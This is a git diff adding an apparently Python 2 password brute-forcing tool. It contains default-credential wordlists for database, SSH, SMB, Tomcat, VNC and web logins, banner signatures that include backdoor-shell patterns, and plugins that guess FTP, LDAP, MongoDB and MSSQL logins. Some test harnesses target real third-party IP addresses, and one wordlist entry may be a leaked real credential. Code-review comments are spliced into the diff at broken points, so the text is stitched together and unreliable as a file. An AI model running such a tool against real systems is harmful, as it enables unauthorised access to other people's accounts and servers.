+sa:1qaz2ws3e4
+sa:qazwsxedc
+sa:!@#$%^&*
+sa:sa1433
+sa:sapass
+sa:sa1434
+sa:sapassword
+sa:sapasswd
+sa:aS6kR9auNM
diff --git a/Bruteforce/conf/mysql.conf b/Bruteforce/conf/mysql.conf
new file mode 100644
index 0000000..1ebee22
--- /dev/null
+++ b/Bruteforce/conf/mysql.conf
@@ -0,0 +1,75 @@
+root:1
+root:12
+root:123
+root:1234
+root:12345
+root:123456
+root:1234567
+root:12345678
+root:123456789
+root:1234567890
+root:654321
+root:54321
+root:00000000
+root:88888888
+root:
+root:root
+root:root123
+root:root123456
+root:pass
+root:password
+root:passwd
+root:!@#$%^
+root:1q2w3e
+root:qawsed
+root:pwd
+root:1qaz2ws3e4
+root:qazwsxedc
+root:!@#$%^&*
+root:root3306
+root:rootpass
+root:root3307
+root:rootpassword
+root:rootpasswd
+mysql:1
+mysql:12
+mysql:123
+mysql:1234
+mysql:12345
+mysql:123456
+mysql:1234567
+mysql:12345678
+mysql:123456789
+mysql:1234567890
+mysql:654321
+mysql:54321
+mysql:00000000
+mysql:mysql
+mysql:88888888
+mysql:pass
+mysql:password
+mysql:passwd
+mysql:!@#$%^
+mysql:1q2w3e
+mysql:qawsed
+mysql:pwd
+mysql:1qaz2ws3e4
+mysql:qazwsxedc
+mysql:!@#$%^&*
+mysql:root3306
+mysql:rootpass
+mysql:root3307
+mysql:rootpassword
+mysql:rootpasswd
+test:1
+test:123123
+test:12
+test:123
+test:1234
+test:12345
+test:123456
+test:1234567
+test:12345678
+test:123456789
+test:test
+test:654321
\ No newline at end of file
diff --git a/Bruteforce/conf/pop3.conf b/Bruteforce/conf/pop3.conf
new file mode 100644
index 0000000..e69de29
diff --git a/Bruteforce/conf/postgres.conf b/Bruteforce/conf/postgres.conf
new file mode 100644
index 0000000..2ba2c9f
--- /dev/null
+++ b/Bruteforce/conf/postgres.conf
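Review bot: `sa:aS6kR9auNM` at the end of mssql.conf does not fit the generic weak-password pattern of the entries around it (`sa:sa1433`, `sa:sapass`); if it was copied from a real environment it is a leaked credential sitting in the repository and should be removed, and if it is a published vendor default it deserves a note in the README saying so, since this `user:password` format has no comment syntax. Every list in this change uses `:` as the separator, so a password containing `:` cannot be expressed and `sa:` / `root:` rely on the empty string being preserved; confirm the plugins split on the first colon only, e.g. `user, password = line.split(':', 1)`, and that they handle the empty password rather than skipping the line.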
@@ -0,0 +1,64 @@
+root:1
+root:12
+root:123
+root:x90x00
+root:1234
+root:12345
+root:123456
+root:1234567
+root:12345678
+root:123456789
+root:1234567890
+root:654321
+root:54321
+root:00000000
+root:88888888
+root:root
+root:root123
+root:root123456
+root:pass
+root:motianlun
+root:mofashi
+root:password
+root:passwd
+root:!@#$%^
+root:1q2w3e
+root:qawsed
+root:pwd
+root:1qaz2ws3e4
+root:qazwsxedc
+root:!@#$%^&*
+root:root3306
+root:rootpass
+root:root3307
+root:rootpassword
+root:rootpasswd
+postgres:1
+postgres:12
+postgres:123
+postgres:1234
+postgres:12345
+postgres:123456
+postgres:1234567
+postgres:12345678
+postgres:123456789
+postgres:1234567890
+postgres:postgres
+postgres:654321
+postgres:54321
+postgres:88888888
+postgres:pass
+postgres:password
+postgres:passwd
+postgres:!@#$%^
+postgres:1q2w3e
+postgres:qawsed
+postgres:pwd
+postgres:1qaz2ws3e4
+postgres:qazwsxedc
+postgres:!@#$%^&*
+postgres:postgres654321
+postgres:postgres123456
+postgres:postgres123
+postgres:postgrespassword
+postgres:postgrespasswd
\ No newline at end of file
diff --git a/Bruteforce/conf/signs.conf b/Bruteforce/conf/signs.conf
new file mode 100644
index 0000000..080e022
--- /dev/null
+++ b/Bruteforce/conf/signs.conf
@@ -0,0 +1,80 @@ +http|^HTTP.* +http|^HTTP/0. +http|^HTTP/1. +http|.* +http|.* +http|.* +http|Bad Request .Invalid URL. +redis|ERR unknown command +redis|ERR wrong number of arguments +mongodb|^.*version.....([\.\d]+) +pop3|.*POP3.* +pop3|.*pop3.* +ssh|SSH-2.0-OpenSSH.* +ssh|SSH-1.0-OpenSSH.* +ssh|.*ssh.* +backdoor-fxsvc|^500 Not Loged in +backdoor-shell|GET: command +backdoor-shell|sh: GET: +bachdoor-shell|[a-z]*sh: .* command not found +backdoor-shell|^bash[$#] +backdoor-shell|^sh[$#] +backdoor-cmdshell|^Microsoft Windows .* Copyright .*> +ftp|^220.*\n331 +ftp|^220.*\n530 +ftp|^220.*FTP +ftp|^220 .* Microsoft .* FTP +ftp|^220 Inactivity timer +ftp|^220 .* UserGate +ftp|^220(.*?) +ldap|^\x30\x0c\x02\x01\x01\x61 +ldap|^\x30\x32\x02\x01 +ldap|^\x30\x33\x02\x01 +ldap|^\x30\x38\x02\x01 +ldap|^\x30\x84 +ldap|^\x30\x45 +ldap|^\x30.* +smb|^\0\0\0.\xffSMBr\0\0\0\0.* +mssql|^\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.* +mssql|^\x05\x6e\x00 +mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\0\x25\0\0\x01\0\0\0\x15\0\x06\x01.* +mssql|^\x04\x01\x00\x25\x00\x00\x01.* +mysql|^\x19\x00\x00\x00\x0a +mysql|^\x2c\x00\x00\x00\x0a +mysql|hhost \' +mysql|khost \' +mysql|mysqladmin +mysql|(.*)5(.*)log +mysql|(.*)4(.*)log +mysql|whost \' +mysql|^\(\x00\x00 +mysql|this MySQL +mysql|^N\x00 +mysql|(.*)mysql(.*) +mssql|;MSSQLSERVER; +oracle|\(ERROR_STACK=\(ERROR=\(CODE= +oracle|\(ADDRESS=\(PROTOCOL= +postgres|Invalid packet length +postgres|^EFATAL +rsync|^@RSYNCD:.* +snmp|\x70\x75\x62\x6c\x69\x63\xa2 +snmp|\x41\x01\x02 +ssh|^SSH- +ssh|^SSH-.*openssh +telnet|^\xff\xfd +telnet-disabled|Telnet is disabled now +telnet|^\xff\xfe +telnet|^xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd.* +vnc|^RFB.*' diff --git a/Bruteforce/conf/smb.conf b/Bruteforce/conf/smb.conf new file mode 100644 index 0000000..1ed9085 --- /dev/null 
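Review bot: The three `http|.*` entries near the top of signs.conf match every banner, including an empty read, and `portscan.matchbanner` returns the first signature whose `re.search` succeeds in file order, so anything that answers with data (SSH, FTP, MySQL and Redis greetings alike) is labelled `http` and the more specific signatures below never run; the special case in `handleunknown` that moves `:27017` from `http` to `mongodb` looks like a workaround for exactly this. Delete those three lines, or move them to the very end of the file as a last-resort fallback. `telnet|^xff\xfb\x01...` is missing the backslash on its first byte (`^\xff\xfb`) and `vnc|^RFB.*'` carries a stray trailing quote, so both silently never match. The hunk header announces 80 lines but only 72 are visible here, so the rendering may have dropped entries; check the file itself before relying on this review.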
+++ b/Bruteforce/conf/smb.conf
@@ -0,0 +1,67 @@
+administrator:1
+administrator:12
+administrator:
+administrator:administrator
+administrator:123
+administrator:1234
+administrator:12345
+administrator:123456
+administrator:1234567
+administrator:12345678
+administrator:123456789
+administrator:1234567890
+administrator:654321
+administrator:54321
+administrator:00000000
+administrator:88888888
+administrator:pass
+administrator:password
+administrator:passwd
+administrator:!@#$%^
+administrator:1q2w3e
+administrator:qawsed
+administrator:pwd
+administrator:1qaz2ws3e4
+administrator:qazwsxedc
+administrator:!@#$%^&*
+admin:1
+admin:12
+admin:admin
+admin:123
+admin:1234
+admin:12345
+admin:123456
+admin:1234567
+admin:12345678
+admin:123456789
+admin:1234567890
+admin:654321
+admin:54321
+admin:00000000
+admin:88888888
+admin:pass
+admin:password
+admin:passwd
+admin:!@#$%^
+admin:1q2w3e
+admin:qawsed
+admin:pwd
+admin:1qaz2ws3e4
+admin:qazwsxedc
+admin:!@#$%^&*
+admin:rootpass
+admin:rootpassword
+admin:rootpasswd
+test:1
+test:123123
+test:12
+test:123
+test:1234
+test:12345
+test:123456
+test:1234567
+test:12345678
+test:123456789
+test:test
+test:654321
+test:54321
\ No newline at end of file
diff --git a/Bruteforce/conf/snmp.conf b/Bruteforce/conf/snmp.conf
new file mode 100644
index 0000000..d70ebaa
--- /dev/null
+++ b/Bruteforce/conf/snmp.conf
@@ -0,0 +1 @@
+public
\ No newline at end of file
diff --git a/Bruteforce/conf/ssh.conf b/Bruteforce/conf/ssh.conf
new file mode 100644
index 0000000..e5e62af
--- /dev/null
+++ b/Bruteforce/conf/ssh.conf
@@ -0,0 +1,86 @@
+root:1
+root:12
+root:root
+root:root123
+root:root123456
+root:123
+root:1234
+root:12345
+root:123456
+root:1234567
+root:12345678
+root:123456789
+root:1234567890
+root:654321
+root:54321
+root:00000000
+root:88888888
+root:pass
+root:password
+root:passwd
+root:!@#$%^
+root:1q2w3e
+root:qawsed
+root:pwd
+root:test
+root:qwe123
+root:1qaz2ws3e4
+root:qazwsxedc
+root:!@#$%^&*
+root:root123
+root:root123456
+root:rootpass
+root:rootpassword
+root:rootpasswd
+root:admin
+root:admin123
+root:-
+root:_
+root:1qaz2wsx
+root:666666
+root:888888
+root:123123
+root:toor
+root:123abc
+root:passw0rd
+admin:1
+admin:12
+admin:admin
+admin:123
+admin:1234
+admin:12345
+admin:123456
+admin:1234567
+admin:12345678
+admin:123456789
+admin:1234567890
+admin:654321
+admin:54321
+admin:00000000
+admin:88888888
+admin:pass
+admin:password
+admin:passwd
+admin:!@#$%^
+admin:1q2w3e
+admin:qawsed
+admin:pwd
+admin:1qaz2ws3e4
+admin:qazwsxedc
+admin:!@#$%^&*
+admin:rootpass
+admin:rootpassword
+admin:rootpasswd
+test:1
+test:12
+test:123
+test:1234
+test:123123
+test:12345
+test:123456
+test:1234567
+test:12345678
+test:123456789
+test:test
+test:654321
+test:54321
diff --git a/Bruteforce/conf/tomcat.conf b/Bruteforce/conf/tomcat.conf
new file mode 100644
index 0000000..4eb9405
--- /dev/null
+++ b/Bruteforce/conf/tomcat.conf
@@ -0,0 +1,69 @@
+tomcat:1
+tomcat:12
+tomcat:tomcat
+tomcat:tomcat123
+tomcat:tomcat123456
+tomcat:123
+tomcat:1234
+tomcat:12345
+tomcat:123456
+tomcat:1234567
+tomcat:12345678
+tomcat:123456789
+tomcat:1234567890
+tomcat:654321
+tomcat:54321
+tomcat:00000000
+tomcat:88888888
+tomcat:pass
+tomcat:password
+tomcat:passwd
+tomcat:!@#$%^
+tomcat:1q2w3e
+tomcat:qawsed
+tomcat:pwd
+tomcat:1qaz2ws3e4
+tomcat:qazwsxedc
+tomcat:!@#$%^&*
+tomcat:s3cret
+admin:1
+admin:12
+admin:admin
+admin:123
+admin:1234
+admin:12345
+admin:123456
+admin:1234567
+admin:12345678
+admin:123456789
+admin:1234567890
+admin:654321
+admin:54321
+admin:00000000
+admin:88888888
+admin:pass
+admin:password
+admin:passwd
+admin:!@#$%^
+admin:1q2w3e
+admin:qawsed
+admin:pwd
+admin:1qaz2ws3e4
+admin:qazwsxedc
+admin:!@#$%^&*
+admin:rootpass
+admin:rootpassword
+admin:rootpasswd
+test:1
+test:12
+test:123
+test:1234
+test:12345
+test:123456
+test:1234567
+test:123123
+test:12345678
+test:123456789
+test:test
+test:654321
+test:54321
\ No newline at end of file
diff --git a/Bruteforce/conf/vnc.conf b/Bruteforce/conf/vnc.conf
new file mode 100644
index 0000000..9d690c9
--- /dev/null
+++ b/Bruteforce/conf/vnc.conf
@@ -0,0 +1,34 @@
+root
+vnc
+vnc123
+vncpass
+vnc123456
+vncpassword
+vncpasswd
+123
+1234
+12345
+123456
+1234567
+12345678
+123456789
+1234567890
+654321
+rootpass
+54321
+00000000
+88888888
+pass
+password
+passwd
+!@#$%^
+1q2w3e
+qawsed
+pwd
+1qaz2ws3e4
+qazwsxedc
+!@#$%^&*
+root123
+root123456
+rootpassword
+rootpasswd
\ No newline at end of file
diff --git a/Bruteforce/conf/web.conf b/Bruteforce/conf/web.conf
new file mode 100644
index 0000000..b4db38f
--- /dev/null
+++ b/Bruteforce/conf/web.conf
@@ -0,0 +1,69 @@ +cisco:1 +cisco:12 +cisco:cisco +cisco:123 +cisco:1234 +cisco:12345 +cisco:123456 +cisco:1234567 +cisco:12345678 +cisco:123456789 +cisco:1234567890 +cisco:654321 +cisco:54321 +cisco:00000000 +cisco:88888888 +cisco:pass +cisco:password +cisco:passwd +cisco:!@#$%^ +cisco:1q2w3e +cisco:qawsed +cisco:pwd +cisco:1qaz2ws3e4 +cisco:qazwsxedc +cisco:!@#$%^&* +cisco:rootpass +cisco:rootpassword +cisco:rootpasswd +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:123123 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/factorys/__init__.py b/Bruteforce/factorys/__init__.py new file mode 100644 index 0000000..013e4b7 --- /dev/null +++ b/Bruteforce/factorys/__init__.py @@ -0,0 +1 @@ +#!/usr/bin/python diff --git a/Bruteforce/factorys/__init__.pyc b/Bruteforce/factorys/__init__.pyc new file mode 100644 index 0000000..497125a Binary files /dev/null and b/Bruteforce/factorys/__init__.pyc differ diff --git a/Bruteforce/factorys/pluginFactory.py b/Bruteforce/factorys/pluginFactory.py new file mode 100644 index 0000000..b64b07c --- /dev/null +++ b/Bruteforce/factorys/pluginFactory.py 
@@ -0,0 +1,101 @@
+# coding: utf-8
+__author__="wilson"
+import os
+import sys
+
+sys.path.append("../")
+
+from plugins.ftp import *
+from plugins.smb import *
+from plugins.mysql import *
+from plugins.mssql import *
+from plugins.ldapd import *
+from plugins.mongodb import *
+from plugins.redisexp import *
+from plugins.rsync import *
+from plugins.snmp import *
+from plugins.ssh import *
+from plugins.ssltest import *
+from plugins.vnc import *
+from plugins.web import *
+
+def ftpburp(c):
+ t = ftp_burp(c)
+ return t
+
+def smbburp(c):
+ t = smb_burp(c)
+ return t
+
+def mysqlburp(c):
+ t = mysql_burp(c)
+ return t
+
+def mssqlburp(c):
+ t = mssql_burp(c)
+ return t
+
+def ldapburp(c):
+ t = ldap_burp(c)
+ return t
+
+def mongodbburp(c):
+ t = mongodb_burp(c)
+ return t
+
+def redisburp(c):
+ t = redis_burp(c)
+ return t
+
+def rsyncburp(c):
+ t = rsync_burp(c)
+ return t
+
+def snmpburp(c):
+ t = snmp_burp(c)
+ return t
+
+def sshburp(c):
+ t = ssh_burp(c)
+ return t
+
+def sslburp(c):
+ t = ssl_burp(c)
+ return t
+
+def vncburp(c):
+ t = vnc_burp(c)
+ return t
+
+def webburp(c):
+ t = web_burp(c)
+ return t
+#类
+class pluginFactory():
+ def __init__(self,c):
+ self.pluginList=[]
+ self.config=c
+ self.pluginCategory= {
+ "ftp":ftpburp,
+ "smb":smbburp,
+ "mysql":mysqlburp,
+ "mssql":mssqlburp,
+ "ldap":ldapburp,
+ "mongodb":mongodbburp,
+ "redis":redisburp,
+ "rsync":rsyncburp,
+ "snmp":snmpburp,
+ "ssh":sshburp,
+ "ssl":sslburp,
+ "vnc":vncburp,
+ "web":webburp,
+ }
+ self.get_pluginList()
+
+
+ def get_pluginList(self):
+ for name in self.pluginCategory:
+ #实例化每个类
+ result_t=self.pluginCategory.get(name)(self.config)
+ self.pluginList.append(result_t)
+
diff --git a/Bruteforce/factorys/pluginFactory.pyc b/Bruteforce/factorys/pluginFactory.pyc
new file mode 100644
index 0000000..f946932
Binary files /dev/null and b/Bruteforce/factorys/pluginFactory.pyc differ
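Review bot: Every plugin is instantiated eagerly in `get_pluginList`, and each constructor reads its `conf/*.conf` file through `file2list`, so one plugin whose import or constructor fails aborts the whole factory before any target is processed; wrapping `result_t=self.pluginCategory.get(name)(self.config)` in a per-plugin `try`/`except` that logs and skips would isolate a single broken plugin. The thirteen `*burp` wrapper functions add nothing over the classes; `"ftp":ftp_burp` in the dict is equivalent and removes fifty lines. `sys.path.append("../")` is relative to the process's working directory rather than to this file, and `os` is imported but unused. The committed `pluginFactory.pyc`, `factorys/__init__.pyc` and the `plugins/.DS_Store` below are generated artefacts that belong in `.gitignore`, not in the repository.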
diff --git a/Bruteforce/plugins/.DS_Store b/Bruteforce/plugins/.DS_Store
new file mode 100644
index 0000000..bac480a
Binary files /dev/null and b/Bruteforce/plugins/.DS_Store differ
diff --git a/Bruteforce/plugins/__init__.py b/Bruteforce/plugins/__init__.py
new file mode 100644
index 0000000..7c9c8f4
--- /dev/null
+++ b/Bruteforce/plugins/__init__.py
@@ -0,0 +1 @@
+__author__ = 'wilson'
diff --git a/Bruteforce/plugins/__init__.pyc b/Bruteforce/plugins/__init__.pyc
new file mode 100644
index 0000000..5cb4cab
Binary files /dev/null and b/Bruteforce/plugins/__init__.pyc differ
diff --git a/Bruteforce/plugins/ftp.py b/Bruteforce/plugins/ftp.py
new file mode 100644
index 0000000..fff0050
--- /dev/null
+++ b/Bruteforce/plugins/ftp.py
@@ -0,0 +1,76 @@
+#coding=utf-8
+import time
+import threading
+from multiprocessing.dummy import Pool
+from printers import printPink,printGreen
+from ftplib import FTP
+
+
+class ftp_burp(object):
+
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+ self.lines=self.config.file2list("conf/ftp.conf")
+
+
+ def ftp_connect(self,ip,username,password,port):
+ crack=0
+ try:
+ ftp=FTP()
+ ftp.connect(ip,str(port))
+ ftp.login(user=username,passwd=password)
+ crack=1
+ ftp.close()
+ except Exception,e:
+ self.lock.acquire()
+ print "%s ftp service 's %s:%s login fail " %(ip,username,password)
+ self.lock.release()
+ return crack
+
+
+ def ftp_l(self,ip,port):
+ try:
+ for data in self.lines:
+ username=data.split(':')[0]
+ password=data.split(':')[1]
+ if self.ftp_connect(ip,username,password,port)==1:
+ self.lock.acquire()
+ printGreen("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.result.append("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.lock.release()
+ break
+ except Exception,e:
+ pass
+
+ def run(self,ipdict,pinglist,threads,file):
+ if len(ipdict['ftp']):
+ printPink("crack ftp now...")
+ print "[*] start crack ftp %s" % time.ctime()
+ starttime=time.time()
+
+ pool=Pool(threads)
+
+ for ip in ipdict['ftp']:
+ pool.apply_async(func=self.ftp_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
+ pool.close()
+ pool.join()
+
+ print "[*] stop ftp serice %s" % time.ctime()
+ print "[*] crack ftp done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
+
+if __name__ == '__main__':
+ import sys
+ sys.path.append("../")
+ from comm.config import *
+ c=config()
+ ipdict={'ftp': ['192.168.1.1:21']}
+ pinglist=['192.168.1.1']
+ test=ftp_burp(c)
+ test.run(ipdict,pinglist,50,file="../result/test")
+
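Review bot: The `self.lock.acquire()` … `self.lock.release()` pairs in `ftp_connect` and `ftp_l` are not protected by `try`/`finally`, so an exception raised between them (a closed stdout, or a non-ASCII credential hitting the Python 2 `print`) leaves the lock held and every other pool thread blocks on its next acquire for the rest of the run; `with self.lock:` gives the same exclusion and always releases. `ftp.close()` is only reached after a successful login, so each rejected attempt leaves the control socket open until the object is garbage-collected—move it into a `finally` (`FTP.close()` is safe on an unconnected instance). The same unguarded lock pattern is repeated in ldapd.py, mongodb.py, mssql.py, mysql.py, smb.py and snmp.py. `pinglist` is accepted by `run` but never used, and the outer `except Exception,e: pass` in `ftp_l` discards every error without a trace.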
diff --git a/Bruteforce/plugins/ftp.pyc b/Bruteforce/plugins/ftp.pyc
new file mode 100644
index 0000000..cc1ec69
Binary files /dev/null and b/Bruteforce/plugins/ftp.pyc differ
diff --git a/Bruteforce/plugins/ldapd.py b/Bruteforce/plugins/ldapd.py
new file mode 100644
index 0000000..45f2a69
--- /dev/null
+++ b/Bruteforce/plugins/ldapd.py
@@ -0,0 +1,86 @@
+#coding=utf-8
+import time
+import threading
+from printers import printPink,printGreen
+from multiprocessing.dummy import Pool
+import ldap
+
+class ldap_burp(object):
+
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+ self.lines=self.config.file2list("conf/ldapd.conf")
+
+
+ def ldap_connect(self,ip,username,password,port):
+ creak=0
+ try:
+ ldappath='ldap://'+ip+':'+port+'/'
+ l = ldap.initialize(ldappath)
+ re=l.simple_bind(username,password)
+ if re==1:
+ creak=1
+ except Exception,e:
+ if e[0]['desc']=="Can't contact LDAP server":
+ creak=2
+ pass
+ return creak
+
+ def ldap_creak(self,ip,port):
+ try:
+ for data in self.lines:
+ username=data.split(':')[0]
+ password=data.split(':')[1]
+ flag=self.ldap_connect(ip,username,password,port)
+ if flag==2:
+ self.lock.acquire()
+ printGreen("%s ldap at %s can't connect\r\n" %(ip,port))
+ self.lock.release()
+ break
+
+ if flag==1:
+ self.lock.acquire()
+ printGreen("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.result.append("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.lock.release()
+ break
+ else:
+ self.lock.acquire()
+ print "%s ldap service 's %s:%s login fail " %(ip,username,password)
+ self.lock.release()
+ except Exception,e:
+ pass
+
+
+ def run(self,ipdict,pinglist,threads,file):
+ if len(ipdict['ldap']):
+ printPink("crack ldap now...")
+ print "[*] start ldap %s" % time.ctime()
+ starttime=time.time()
+
+ pool=Pool(threads)
+
+ for ip in ipdict['ldap']:
+ pool.apply_async(func=self.ldap_creak,args=(str(ip).split(':')[0],str(ip).split(':')[1]))
+ pool.close()
+ pool.join()
+
+ print "[*] stop ldap serice %s" % time.ctime()
+ print "[*] crack ldap done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
+if __name__ == '__main__':
+ import sys
+ sys.path.append("../")
+ from comm.config import *
+ c=config()
+ ipdict={'ldap': ['124.172.223.236:389']}
+ pinglist=['192.168.1.1']
+ test=ldap_burp(c)
+ test.run(ipdict,pinglist,50,file="../result/test")
+
+
diff --git a/Bruteforce/plugins/ldapd.pyc b/Bruteforce/plugins/ldapd.pyc
new file mode 100644
index 0000000..7a0ebdf
Binary files /dev/null and b/Bruteforce/plugins/ldapd.pyc differ
diff --git a/Bruteforce/plugins/mongodb.py b/Bruteforce/plugins/mongodb.py
new file mode 100644
index 0000000..a1d7cbe
--- /dev/null
+++ b/Bruteforce/plugins/mongodb.py
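Review bot: The handler `if e[0]['desc']=="Can't contact LDAP server":` assumes every exception carries a dict as its first argument; a `socket.timeout`, an `IndexError` from a malformed conf line, or any non-`ldap` error raises `TypeError`/`KeyError` inside the `except` block, which escapes `ldap_connect` and is then silently swallowed by `except Exception,e: pass` in `ldap_creak`, ending the host with no message at all. Guard the lookup with `isinstance(e, ldap.LDAPError)` and read the description with `.get('desc')` before comparing. The `__main__` harness hard-codes a routable third-party address (`124.172.223.236`) as its test target; mongodb.py, redisexp.py, rsync.py and the `pinglist` in smb.py do the same—use loopback or an RFC 5737 documentation address such as `192.0.2.1` so the self-test cannot reach hosts outside the tester's control.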
@@ -0,0 +1,101 @@
+#coding=utf-8
+import time
+import threading
+from printers import printPink,printRed,printGreen
+from multiprocessing.dummy import Pool
+import pymongo
+
+
+class mongodb_burp(object):
+
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+ self.lines=self.config.file2list("conf/mongodb.conf")
+
+
+ def mongoDB_connect(self,ip,username,password,port):
+ crack=0
+ try:
+ connection=pymongo.Connection(ip,port)
+ db=connection.admin
+ db.collection_names()
+ self.lock.acquire()
+ printRed('%s mongodb service at %s allow login Anonymous login!!\r\n' %(ip,port))
+ self.result.append('%s mongodb service at %s allow login Anonymous login!!\r\n' %(ip,port))
+ self.lock.release()
+ crack=1
+
+ except Exception,e:
+ if e[0]=='database error: not authorized for query on admin.system.namespaces':
+ try:
+ r=db.authenticate(username,password)
+ if r!=False:
+ crack=2
+ else:
+ self.lock.acquire()
+ crack=3
+ print "%s mongodb service 's %s:%s login fail " %(ip,username,password)
+ self.lock.release()
+ except Exception,e:
+ pass
+
+ else:
+ printRed('%s mongodb service at %s not connect' %(ip,port))
+ crack=4
+ return crack
+
+
+
+ def mongoDB(self,ip,port):
+ try:
+ for data in self.lines:
+ username=data.split(':')[0]
+ password=data.split(':')[1]
+ flag=self.mongoDB_connect(ip,username,password,port)
+ if flag in [1,4]:
+ break
+
+ if flag==2:
+ self.lock.acquire()
+ printGreen("%s mongoDB at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.result.append("%s mongoDB at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.lock.release()
+ break
+ except Exception,e:
+ pass
+
+
+ def run(self,ipdict,pinglist,threads,file):
+ if len(ipdict['mongodb']):
+ printPink("crack mongodb now...")
+ print "[*] start crack mongodb %s" % time.ctime()
+ starttime=time.time()
+
+ pool=Pool(threads)
+
+ for ip in ipdict['mongodb']:
+ pool.apply_async(func=self.mongoDB,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
+
+ pool.close()
+ pool.join()
+ print "[*] stop mongoDB serice %s" % time.ctime()
+ print "[*] crack mongoDB done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
+
+if __name__ == '__main__':
+ import sys
+ sys.path.append("../")
+ from comm.config import *
+ c=config()
+ ipdict={'mongodb': ['112.90.23.158:27017']}
+ pinglist=['192.168.1.1']
+ test=mongodb_burp(c)
+ test.run(ipdict,pinglist,50,file="../result/test")
+
+
+
diff --git a/Bruteforce/plugins/mongodb.pyc b/Bruteforce/plugins/mongodb.pyc
new file mode 100644
index 0000000..4d027b5
Binary files /dev/null and b/Bruteforce/plugins/mongodb.pyc differ
diff --git a/Bruteforce/plugins/mssql.py b/Bruteforce/plugins/mssql.py
new file mode 100644
index 0000000..2706a03
--- /dev/null
+++ b/Bruteforce/plugins/mssql.py
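Review bot: Inside the `except` branch, `r=db.authenticate(username,password)` uses `db`, which is only bound if `connection=pymongo.Connection(ip,port)` and `connection.admin` both completed; if the exception came from `Connection` itself, `db` is unbound and the resulting `NameError` is swallowed by the inner `except Exception,e: pass`, so `crack` stays 0 with no output. The error path `printRed('%s mongodb service at %s not connect' ...)` writes without taking `self.lock`, unlike every other print in this class, so its output can interleave with other threads. `pymongo.Connection` no longer exists in pymongo 3 (`pymongo.MongoClient` is the supported constructor), and matching on the exact text `e[0]=='database error: not authorized ...'` ties the plugin to one server/driver version—catch `pymongo.errors.OperationFailure` instead.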
@@ -0,0 +1,67 @@
+#coding=utf-8
+import time
+import threading
+from printers import printPink,printGreen
+from multiprocessing.dummy import Pool
+import pymssql
+
+
+
+class mssql_burp(object):
+
+ def __init__(self,c):
+ self.config=c
+ self.lock=threading.Lock()
+ self.result=[]
+ self.lines=self.config.file2list("conf/mssql.conf")
+
+ def mssql_connect(self,ip,username,password,port):
+ crack =0
+ try:
+ db=pymssql.connect(host=str(ip)+':'+str(port),user=username,password=password)
+ if db:
+ crack=1
+ db.close()
+ except Exception, e:
+ self.lock.acquire()
+ print "%s sql service 's %s:%s login fail " %(ip,username,password)
+ self.lock.release()
+ return crack
+
+
+ def mssq1(self,ip,port):
+ try:
+ for data in self.lines:
+ username=data.split(':')[0]
+ password=data.split(':')[1]
+ flag=mssql_connect(ip,username,password,port)
+ if flag==2:
+ break
+ if flag==1:
+ self.lock.acquire()
+ printGreen("%s mssql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.result.append("%s mssql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
+ self.lock.release()
+ break
+ except Exception,e:
+ pass
+
+
+ def run(self,ipdict,pinglist,threads,file):
+ if len(ipdict['mysql']):
+ printPink("crack sql serice now...")
+ print "[*] start crack sql serice %s" % time.ctime()
+ starttime=time.time()
+ pool=Pool(threads)
+ for ip in ipdict['mssql']:
+ pool.apply_async(func=self.mssq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
+ pool.close()
+ pool.join()
+
+ print "[*] stop crack sql serice %s" % time.ctime()
+ print "[*] crack sql serice done,it has Elapsed time:%s " % (time.time()-starttime)
+
+ for i in xrange(len(self.result)):
+ self.config.write_file(contents=self.result[i],file=file)
+
+
diff --git a/Bruteforce/plugins/mssql.pyc b/Bruteforce/plugins/mssql.pyc
new file mode 100644
index 0000000..2011009
Binary files /dev/null and b/Bruteforce/plugins/mssql.pyc differ
